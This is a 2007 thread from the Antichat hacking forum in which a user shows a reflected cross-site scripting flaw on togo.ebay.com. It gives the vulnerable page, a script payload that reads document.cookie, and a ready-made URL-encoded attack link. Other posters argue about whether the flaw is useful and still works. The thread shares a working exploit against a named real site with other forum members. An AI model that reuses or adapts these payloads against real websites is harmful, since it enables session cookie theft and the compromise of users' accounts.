HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Forum for discussion of ANTICHAT
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS On Ebay.com
  #1  
Старый 07.12.2007, 00:40
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами: 9806786

Репутация: 869
По умолчанию XSS On Ebay.com

I am still Fugitif and now I want to show you how can work one vulnerable XSS Alert Bug on Ebay.com.
To be more precise our link now is http://togo.ebay.com

Ok..My XSS alert can be found here http://togo.ebay.com/affiliates/create/





I go to select one version and I crush above





and immediately later click "I WANT THIS ONE"


In the square where asks FOR "ID" I put some string like this

Код:
"><script>alert(document.cookie)</script>




and click "Browse"





Now we cannot do anything else other than to use the search with our magic string

Код:
 "><script>alert(document.cookie)</script>

My Result ? !






That's all .... have fun ppl


/Fugitif
 
Ответить с цитированием

  #2  
Старый 07.12.2007, 01:31
Дрэгги
Постоянный
Регистрация: 26.08.2005
Сообщений: 457
С нами: 10898306

Репутация: 1442
По умолчанию

And what's the exact use of all these operations?
 
Ответить с цитированием

  #3  
Старый 07.12.2007, 03:03
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
С нами: 10223973

Репутация: 123
По умолчанию

Well passive XSS, but the JavaScript code is in the POST parameters, so the victim must enter the needed code by itself?
Think it's useless...
 
Ответить с цитированием

  #4  
Старый 07.12.2007, 05:22
LEE_ROY
Постоянный
Регистрация: 09.11.2006
Сообщений: 639
С нами: 10265091

Репутация: 541


По умолчанию

nice dude
 
Ответить с цитированием

  #5  
Старый 07.12.2007, 05:53
Francuz
Участник форума
Регистрация: 02.11.2007
Сообщений: 108
С нами: 9749455

Репутация: 47
По умолчанию

to Fugitif:
it is does not work already...
 
Ответить с цитированием

  #6  
Старый 07.12.2007, 07:15
-MoLoToK-
Познающий
Регистрация: 04.10.2007
Сообщений: 32
С нами: 9791439

Репутация: 88
По умолчанию

Цитата:
Сообщение от Francuz  
to Fugitif:
it is does not work already...
works for me
 
Ответить с цитированием

  #7  
Старый 09.12.2007, 15:50
symbioin
Познающий
Регистрация: 06.08.2007
Сообщений: 84
С нами: 9876447

Репутация: 25
По умолчанию

hmmmm. I thought ebay have safe protect
 
Ответить с цитированием

  #8  
Старый 09.12.2007, 15:53
Francuz
Участник форума
Регистрация: 02.11.2007
Сообщений: 108
С нами: 9749455

Репутация: 47
По умолчанию

Цитата:
works for me
really?!
what browser did u use?
 
Ответить с цитированием

  #9  
Старый 09.12.2007, 16:08
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами: 9806786

Репутация: 869
По умолчанию

Цитата:
Сообщение от Francuz  
really?!
what browser did u use?

U can try with Mozilla Firefox some string like this one:

Код:
http://togo.ebay.com/app/auctionfinder.php?query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EE&page&seller&category=&TZ=-120&block=list
 
Ответить с цитированием

  #10  
Старый 09.12.2007, 23:28
-MoLoToK-
Познающий
Регистрация: 04.10.2007
Сообщений: 32
С нами: 9791439

Репутация: 88
По умолчанию

Цитата:
Сообщение от Francuz  
really?!
what browser did u use?
mozilla firefox
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Активная XSS на mail.ru Dronga Уязвимости Mail-сервис 69 05.04.2008 01:56
Новая XSS на форуме phpBB 2.0.19 NeMiNeM Уязвимости CMS / форумов 6 26.10.2006 21:30
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...